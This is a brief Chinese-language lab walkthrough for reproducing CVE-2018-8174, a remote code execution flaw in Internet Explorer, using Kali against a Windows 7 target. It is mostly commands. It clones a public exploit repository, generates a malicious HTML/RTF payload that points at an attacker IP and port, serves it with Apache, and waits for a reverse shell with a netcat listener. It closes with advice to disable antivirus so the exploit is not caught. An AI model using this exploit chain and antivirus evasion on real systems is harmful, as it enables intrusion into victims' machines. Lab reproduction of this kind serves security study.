漏洞介绍
CVE2018-8174这个漏洞是针对ie浏览器的一个远程代码执行漏洞
复现环境
kali
win7
复现
克隆文件
git clone https://github.com/Sch01ar/CVE-2018-8174_EXP
生成
python CVE-2018-8174.py -u http://192.168.31.117/exploit.html -o exploit.rtf -i 192.168.31.117 -p 7777
将文件移动到html下吗,启动apache2
/etc/init.d/apache2 start
监听端口
nc -vlp 7777
靶机ie访问
http://192.168.31.117/exploit.html
注:复现时关闭主机火绒,虚拟机内也会被杀;